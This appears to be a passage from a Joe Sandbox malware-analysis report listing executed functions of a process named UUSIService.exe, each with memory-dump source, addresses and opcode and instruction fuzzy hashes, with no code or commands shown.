Source File: 00000013.00000002.2640468282.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2530000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be4988179da45ec07f2610383fd4fdcaa61d39b283edd02dcb7134fb7aad16cc
Instruction ID: b278c061c76f6c86f7bdc9a4b0b1bb36cb8c28e13cff5005afdd93b26383dfd9
Opcode Fuzzy Hash: be4988179da45ec07f2610383fd4fdcaa61d39b283edd02dcb7134fb7aad16cc
Instruction Fuzzy Hash: DF215C343000109FC749DB39D868A6D3BE6FFCDB10BA644A9E506CB376CE21DC068B51

Function 02530A70 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2640468282.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2530000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df148758276f80e0e8c9ed7814194aef56f4a6ab1e596de2f8e6f75b48886a97
Instruction ID: 680d10f1713370636b6dbf082bbdd153e39d37d299dc956b7e7fa0ca38cb8db0
Opcode Fuzzy Hash: df148758276f80e0e8c9ed7814194aef56f4a6ab1e596de2f8e6f75b48886a97
Instruction Fuzzy Hash: 971107343104109FC748EB29D498A1D7BE6FFCDB10BA544A8E50ACB376DE71EC058B91

Function 02530E79 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2640468282.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2530000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3c01c8155b79efac7e9ad83e3a46f3d8f3d31188d6d2750885562f52341478e
Instruction ID: 5bcb8500026088b00761cbc441e3149b056b6e9b17cd0e1e1d96ebf4c131bec1
Opcode Fuzzy Hash: b3c01c8155b79efac7e9ad83e3a46f3d8f3d31188d6d2750885562f52341478e
Instruction Fuzzy Hash: CF216C75A002488FDB05DFA8D4849DCBBF6FF89320F18A4A5E905BB261D731AD95CF60

Function 02530CC0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2640468282.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2530000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baa65cb29464ed7a489fcf2ed1f47f41859054f8109b9489d2933196a77fab05
Instruction ID: d3da8fad2e94fe7412c1d5310e46001242c0ef222796819d71a8f0b73d7db1ab
Opcode Fuzzy Hash: baa65cb29464ed7a489fcf2ed1f47f41859054f8109b9489d2933196a77fab05
Instruction Fuzzy Hash: 45117C72D0074AAACB11CFB9D8800DDFBB5EF99310F254666E110B7650E774259ACB60

Function 02530989 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2640468282.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2530000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cdf76fd0c2faca710796e5334f58d992bc5a1624f0a60b7874c251abcce77f6
Instruction ID: 46acce4aa859c849b4f8f613d240b2eb83079ca93686fb90b536aa5b558b40e0
Opcode Fuzzy Hash: 7cdf76fd0c2faca710796e5334f58d992bc5a1624f0a60b7874c251abcce77f6
Instruction Fuzzy Hash: C7112B78951206EFCB05FF64E8A4959BBB1FB48700B209769D501D736DEA30A946CF81

Function 02530878 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2640468282.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2530000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c5739098edb40a643a02eefef491ba85d109b8308efdd2e2c086e8cc537c5f7
Instruction ID: ef62fe072ab695a9d6031fe9118512c8a356499a0766e34cb5f5aba3ac26ae5a
Opcode Fuzzy Hash: 0c5739098edb40a643a02eefef491ba85d109b8308efdd2e2c086e8cc537c5f7
Instruction Fuzzy Hash: 7B01B132D0465E9BCB019BB9D8004DEFBB2EFCA310F2586A6D15177560EB70258ECBA1

Function 02530CD0 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2640468282.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2530000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6efa57d352fd6ed3d9bc190828ba1f74315759b1088913e44ca9e64dc9e8d0a0
Instruction ID: 2b9df3ba2dee4725bf3ace164e80d0971bfe4a41e97c11f653cbfbe7277c63b0
Opcode Fuzzy Hash: 6efa57d352fd6ed3d9bc190828ba1f74315759b1088913e44ca9e64dc9e8d0a0
Instruction Fuzzy Hash: 34014C32D0060EABCB00DFBAD8404DDFBB5EF89320F218666E11177650E770259ACB60

Function 023BD1C5 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2639913695.00000000023BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 023BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_23bd000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0ccd5bec9036b85a79c63d2d311c1e547e1bda2e4fa0d059d54435173ed7a89
Instruction ID: 156de636aab6a5d8b1fc1619dbb2caf8cb644985d4de9c285510e5327f8cfdc8
Opcode Fuzzy Hash: a0ccd5bec9036b85a79c63d2d311c1e547e1bda2e4fa0d059d54435173ed7a89
Instruction Fuzzy Hash: 2101F7318043889AE7224E15D980BA7FF9CEF45224F18C41AEE090E982C338D442C672

Function 02530998 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2640468282.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2530000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65826a9ab626dad680571da5be3a65ddee3ca0dc0c022bd020978969d16dc52a
Instruction ID: b1b0ca64da48509266514b42495710b8459a8be31580ffed6a16c5e6a9051e19
Opcode Fuzzy Hash: 65826a9ab626dad680571da5be3a65ddee3ca0dc0c022bd020978969d16dc52a
Instruction Fuzzy Hash: 05111878951206EFCB05FF64F8A894DBBB1FB48700B20A768D5018732CEB30A946CF81

Function 02530D51 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2640468282.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2530000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc04875cdbfb7a981c4c7a1da2e3c93254fa7439237b74eadb3e8e76bd6a1687
Instruction ID: 39a2ab11ff19f20700315559cecc8d3c97db06370f98b3fd705e45f0eae6e594
Opcode Fuzzy Hash: fc04875cdbfb7a981c4c7a1da2e3c93254fa7439237b74eadb3e8e76bd6a1687
Instruction Fuzzy Hash: 6DF0FC31910249D7DB15DB78C455AEFBBF6AF84310F584925D102B7240DE706947CBC5

Function 02530900 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2640468282.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2530000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16d8c5c89daba8d0c3c07bdd74bff00f417cfcf97384c56775834d6a2d4aef39
Instruction ID: aa5e6b9e576c68ddb4460f6e06004540443b4dd1f67a7b652b625b99283a299c
Opcode Fuzzy Hash: 16d8c5c89daba8d0c3c07bdd74bff00f417cfcf97384c56775834d6a2d4aef39
Instruction Fuzzy Hash: FAF04C32A1024E97DB059B24C865AEFBFFA9FC4310F548925D542B7280DE709907C7C6

Function 023BD1C4 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2639913695.00000000023BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 023BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_23bd000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ce843baf6338a3eb2c5a3127415a62c8ad7adb0abc7cda93dad1d0e0a8c3abb
Instruction ID: 8fefb1f86ed8b85cbc683d0bab32e401ff570cc1be71f9977777e5a99d908a33
Opcode Fuzzy Hash: 3ce843baf6338a3eb2c5a3127415a62c8ad7adb0abc7cda93dad1d0e0a8c3abb
Instruction Fuzzy Hash: 24F09671805388AEE7118E16DCC4BA6FFD8EF81634F18C55AFE084F686C3799844CA71

Function 02530910 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2640468282.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2530000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b75b8d358ece6f4eeaf8393b1037cb73e5175e8e032b89c1a7efe31eaebe877d
Instruction ID: fb7b4953d54578b529c440ffb611d6a2cafa1b05f15d1364a62990d8c15685d0
Opcode Fuzzy Hash: b75b8d358ece6f4eeaf8393b1037cb73e5175e8e032b89c1a7efe31eaebe877d
Instruction Fuzzy Hash: B4F0E272E1020E97EF05DB64C865AEFBBBA9F84300F048926D502B7380DEB06906C7C5

Function 02530838 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2640468282.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2530000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4f4f122aeaca06e9b818ecd96b28f0e0313b03af6b8ab965391f4172c5512ab
Instruction ID: a8344b83d8c817a1ce7300c2a231895f9245d127dffb909756f0803ab9dfccc5
Opcode Fuzzy Hash: f4f4f122aeaca06e9b818ecd96b28f0e0313b03af6b8ab965391f4172c5512ab
Instruction Fuzzy Hash: F9E092A28493889FDB12CBA884017897FB5BB12380FD604C3D484CB146D6319E42CB96

Function 02531798 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2640468282.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2530000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f207fe4c0bbf6460b713f0302fe742d5bfddcdd17bc4fb6b1733d8fb0156747
Instruction ID: b891d334ee615f69c5638d315d0d6b6a13d721bd3f5a44eb73270dd27959ac7d
Opcode Fuzzy Hash: 5f207fe4c0bbf6460b713f0302fe742d5bfddcdd17bc4fb6b1733d8fb0156747
Instruction Fuzzy Hash: 0CD02B3130431557CF2A62B4A80056A73DAAFC4365700547ED10DC7780D932C80087C8

Function 02530848 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2640468282.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2530000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12d9f856a48a6758d6fd089dc599cea9990646014d664c754b4b238470fcc19d
Instruction ID: a1ccfb04bd6b7d42a2737b4336141fb5d927e54c4cde0435015b623b809b73c7
Opcode Fuzzy Hash: 12d9f856a48a6758d6fd089dc599cea9990646014d664c754b4b238470fcc19d
Instruction Fuzzy Hash: 78D017B2D05308EFEB02CFB4C80575DBBB8BB05280F660496E448D7241DA319E50C795

Function 02531788 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2640468282.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2530000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6859f168e28a0886c06a11d0ed4e0e87d14b987b6fda6d5039c9eb17e34d19ab
Instruction ID: d8feb2c5ba23018979d5243095e7ff829025e57b7231e71773c0aeffcabcbf58
Opcode Fuzzy Hash: 6859f168e28a0886c06a11d0ed4e0e87d14b987b6fda6d5039c9eb17e34d19ab
Instruction Fuzzy Hash: EED0A77210D3900ED71B12745A600617F65AE4215030E58FBC448CF6A3D53094159F44

Analysis Process: UUSIService.exePID: 1948, Parent PID: 4004COMMON

Executed Functions

Function 04F90DE8 Relevance: .4, Instructions: 374COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2851676704.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4f90000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ecbcb34a27fc2b9375d92c18dba8e7ab347fc19db8b7dff1a45f257ebbdd5b5
Instruction ID: ba0656fbe13e0c1ca756bb0d4b31928494c8341511476304ec22322066e8441b
Opcode Fuzzy Hash: 6ecbcb34a27fc2b9375d92c18dba8e7ab347fc19db8b7dff1a45f257ebbdd5b5
Instruction Fuzzy Hash: 9FF1E835A002498FEB05DFA8C484ADCBBF6FF89320F199595E445AB3A1D731AD85CF60

Function 04F90DDB Relevance: .4, Instructions: 352COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2851676704.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4f90000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 873c9f86de4dd25cdc2f3dac15b3b80131723d4cae81395af6dd68655a7a0065
Instruction ID: a4f002551f2af4aa3bf498150100a2d69434a5700d950ea2f666f6db216cbfad
Opcode Fuzzy Hash: 873c9f86de4dd25cdc2f3dac15b3b80131723d4cae81395af6dd68655a7a0065
Instruction Fuzzy Hash: 2BF11835A002498FEB05DFA8C484ADDBBF6FF49320F189595E445AB3A2D731AD85CF60

Function 04F91509 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2851676704.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4f90000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa1059dcbf712dbdd678e26a375ceaa0c8763cbcc09aaa902a2a08be89e2b2a8
Instruction ID: 0007e6d5ad5e9b48e857acf572a1d02385e5e588d8ae11bd0d1bdbc97dbd8548
Opcode Fuzzy Hash: fa1059dcbf712dbdd678e26a375ceaa0c8763cbcc09aaa902a2a08be89e2b2a8
Instruction Fuzzy Hash: 6FF02439604301AFD7066779D8009AABBA6EFC1250B1445BDE50ACB340EF30EC4B8BD5

Function 04F90B28 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2851676704.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4f90000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c49a5cac43985e0a3b1c6c070dd0634eaf5e8231228ad36628797a520cd62dbc
Instruction ID: b5ccdf7f24a266a45e6ac13ea9c8c28581fa89ea0de61a10f63a99d32cbbe2dc
Opcode Fuzzy Hash: c49a5cac43985e0a3b1c6c070dd0634eaf5e8231228ad36628797a520cd62dbc
Instruction Fuzzy Hash: FC41B271A017558FEF21CF28D84059EBBF1FF88700B144A6AE486EB695DB30BC45CB50

Function 04F90A60 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2851676704.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4f90000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed6af13c69dfcfa20783ea60b110b97cbf79f711203c3dfe545b993a6fc5eb57
Instruction ID: 238d918d74d0f16928ecd302cb7a9706653c1aca254805442bc6cc673a3baa51
Opcode Fuzzy Hash: ed6af13c69dfcfa20783ea60b110b97cbf79f711203c3dfe545b993a6fc5eb57
Instruction Fuzzy Hash: 37214A383111109FC745AB29D458A2D7BE2FF8DA11B6544A9F40ACB3B2DA31DC068B92

Function 04F90A70 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2851676704.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4f90000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebb64315d52c0732952164de7bb0c2bece9c9194565a8af1660523660c22484e
Instruction ID: 6f41854c26890d4cebb6e802483cb03a9d5cc3a8102d5fa15e9247ac8fd3a21c
Opcode Fuzzy Hash: ebb64315d52c0732952164de7bb0c2bece9c9194565a8af1660523660c22484e
Instruction Fuzzy Hash: EB1107383104109FC744EB2DD498A1D7BE6FFCDA15BA544A8E50ACB3B6DE71EC068B91

Function 04F90E79 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2851676704.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4f90000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 570a4ceb2f6ee75a70df712ea9065876b28cb7f26942d9a37ba1d7b618f6b2f7
Instruction ID: 42bfbd4a2333193393e1eb58d0678147642dc8ea9a75769ce40682f8aff48823
Opcode Fuzzy Hash: 570a4ceb2f6ee75a70df712ea9065876b28cb7f26942d9a37ba1d7b618f6b2f7
Instruction Fuzzy Hash: 95219235A002198FEB05DF98D5849DCBBF6FF8D220F1894A5E805BB261D731AD95CF60

Function 04F90CC0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2851676704.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4f90000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9cba518079ec906abdd0d071852f59d9a4e3008920144f0d542327e905450bb
Instruction ID: 1e5a6ab24fd575e31089a18752a8c766adc753dc40c6dec73551836cc58cecd4
Opcode Fuzzy Hash: d9cba518079ec906abdd0d071852f59d9a4e3008920144f0d542327e905450bb
Instruction Fuzzy Hash: 63117C32D0174AAACB11CFB9D8800DDFBB1EF9A310F254A66E150B7250E774258ACB60

Function 04F90989 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2851676704.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4f90000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1d5fe6c9c2995fac69d95e02ac7287bb7f867983a7e13332e469f9a58292323
Instruction ID: 0a194f315afd7fdab62092ab4c2a1e259cb83f625e7c77b0fb4585e2fbbcb991
Opcode Fuzzy Hash: e1d5fe6c9c2995fac69d95e02ac7287bb7f867983a7e13332e469f9a58292323
Instruction Fuzzy Hash: E3111938910206DFCB06EF65FA94958BFB1FB44708B6046A9D4099B66DFB309A46CF80

Function 04F90878 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2851676704.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4f90000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 697601a2b9713add6eb59034864f4cc969ed38095fdcf1bd4f71620663b61dae
Instruction ID: f62cdcc407a9fd6c3b2f78c9a00b4f9d62234acd5e5080d72678bc21646dee1e
Opcode Fuzzy Hash: 697601a2b9713add6eb59034864f4cc969ed38095fdcf1bd4f71620663b61dae
Instruction Fuzzy Hash: C401B132D1464A9BCF019BB9D8104DDFBB2EFCB310F2586A6D1517B160EB70259ECBA1

Function 04F90CD0 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2851676704.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4f90000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39522161e48cf4ffbb2b4a13851118cc9e8ca2aa502638a5026e274536c38e66
Instruction ID: e7303293cdaf85082212b57b5e1fc13b6702dbbea31b67df9e739e1131f4441c
Opcode Fuzzy Hash: 39522161e48cf4ffbb2b4a13851118cc9e8ca2aa502638a5026e274536c38e66
Instruction Fuzzy Hash: D4010C32D1060EABCB00DFBAD8404DDFBB5EF99320F258766E11577650E774259ACB60

Function 028BD1C5 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2851075596.00000000028BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 028BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_28bd000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15bddf1279378058dda099583d5eaf497b40d242d48c68c6f7f0799ff92da004
Instruction ID: 0eac9ce8dfab43a11c23fef21446a812d9bf48070a74c6e9c9c709ec073063ca
Opcode Fuzzy Hash: 15bddf1279378058dda099583d5eaf497b40d242d48c68c6f7f0799ff92da004
Instruction Fuzzy Hash: 6101A739405385FAE7224E55D984BA7FF98EF45224F18C45EED198A382C379E441C671

Function 04F90998 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2851676704.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4f90000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: caff7b89c21930b903bceffeea5ce61d523c02e3db6c1b023fbc84fb534bd790
Instruction ID: 88ad05c97c0215ef4d47856d18c5a16fe3cb08ecf2ac788f2642679c39d41121
Opcode Fuzzy Hash: caff7b89c21930b903bceffeea5ce61d523c02e3db6c1b023fbc84fb534bd790
Instruction Fuzzy Hash: EF110A38900106CFCB05FF65FA94948BBB1FB4470876046A8D5099B66CFB30AA46CF80

Function 04F90900 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2851676704.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4f90000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4a990df653bb41fd2bccffca23c570f5dee712f860ebf199002e634ce351427
Instruction ID: 0cf1846d0a49631c04fda3658ab69f34f092d7e6efa00f6dcf4cbf6eb298cd93
Opcode Fuzzy Hash: f4a990df653bb41fd2bccffca23c570f5dee712f860ebf199002e634ce351427
Instruction Fuzzy Hash: 3101F472A2024A9BDB059F24C861ADFBFF59F85310F044929E542AB340EE705902C7D6

Function 04F90D51 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2851676704.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4f90000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e75c81b9442742200b7ded744441c198747a6903164636eb2a9d7473b6e858f
Instruction ID: 979560a9ed098636c6f63253f84febbffa98352313d82165a6bd6f5d27d2798c
Opcode Fuzzy Hash: 2e75c81b9442742200b7ded744441c198747a6903164636eb2a9d7473b6e858f
Instruction Fuzzy Hash: D5F0C272A1021ADBDB14DB64C855AEEBBB5AF84310F09452AD502AB380EF706946D7C2

Function 028BD1C4 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2851075596.00000000028BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 028BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_28bd000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74036850d36404afc71eb78885e4a1f3e7a4f27cd38a68020915b6108bd16db1
Instruction ID: d542f5c8beac602b17f081909703a4fc2cc4e03381a09092dc078e00057b76dd
Opcode Fuzzy Hash: 74036850d36404afc71eb78885e4a1f3e7a4f27cd38a68020915b6108bd16db1
Instruction Fuzzy Hash: 61F06276405384AEE7118E15D9C4BA6FF98EF81634F18C45EED0C4B286C379A845CA71

Function 04F90910 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2851676704.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4f90000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2971bca4ca7e9a82975278367f1b9b03279513e802c77cd79ded67c828d0add5
Instruction ID: fa47295590e2eabffb87b1af68e569a50493d5aa820f0d3993098a27be63d07b
Opcode Fuzzy Hash: 2971bca4ca7e9a82975278367f1b9b03279513e802c77cd79ded67c828d0add5
Instruction Fuzzy Hash: 7EF08972E10149DBDF04DB64C965AEFBBF69F84300F154929D502B7340DE70690687D1

Function 04F90838 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2851676704.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4f90000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 174c1c48abd9e45c8a675091936166ed0492e373f2b70d4f423b0d3afa75fdae
Instruction ID: f5064cf860acd76ce9ffc81bff35c1ec9b5762afe40e0310869dab3c38f8143c
Opcode Fuzzy Hash: 174c1c48abd9e45c8a675091936166ed0492e373f2b70d4f423b0d3afa75fdae
Instruction Fuzzy Hash: DDE06571919389DFDB02CFA4C411289BBB4EF02280F5605C6E084CF262EA319A82C796

Function 04F91798 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2851676704.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4f90000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9001eb85b6ba77e69ad0b8d72cca534da6bb3450b4b5c594d7216ce8cda66d16
Instruction ID: 879cc32b8c5aab8c6341e830298e4f1a29c7d9473dfc2505518f15f6ef5029d2
Opcode Fuzzy Hash: 9001eb85b6ba77e69ad0b8d72cca534da6bb3450b4b5c594d7216ce8cda66d16
Instruction Fuzzy Hash: 0FD02E327403158BFF38A6B86C005AA33E98FC5269B00047ED20DCB380ED32EC0287C4

Function 04F90848 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2851676704.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4f90000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c65de2fde9978f7136a51d06494869dd4ba9e7404ada312d510cec2ba5993c76
Instruction ID: e1794f396385cba451a239d1de40be0a0232774b2b4f4a2532298373cb1c2d28
Opcode Fuzzy Hash: c65de2fde9978f7136a51d06494869dd4ba9e7404ada312d510cec2ba5993c76
Instruction Fuzzy Hash: 20D017B2D45248EFEB01CFA4C40575D7BF8EB05280F660496E448C7241DA319E51D791

Function 04F91788 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2851676704.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4f90000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
